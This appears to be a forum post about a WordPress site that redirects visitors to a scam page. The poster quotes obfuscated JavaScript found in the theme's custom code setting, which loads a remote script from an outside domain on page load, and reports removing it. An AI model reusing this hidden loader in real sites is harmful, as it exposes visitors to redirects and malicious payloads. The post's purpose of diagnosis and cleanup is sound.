today my client told me that his website automatically redirect to another one external scam website. On first sight no problem in the file directories, and no injections in the fields of the settings.
Wordfence no report any type of warning, but the Avast Antivirus in the client machine report a trojan warning:
"JS:Fakepush-A [Trj]" infection
Wordpress version 5.4.1 Theme: Newspapaer V 6.6.4
Any ideas?
After a closer look I found a portion of code that seemed foreign to the original project, in the theme settings---->Custom Code----->Custom Javascript:
var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}
Removed. After a total cache clean (.js min included) the website don't redirect anymore. Moreover, i think that the theme needs an upgrade.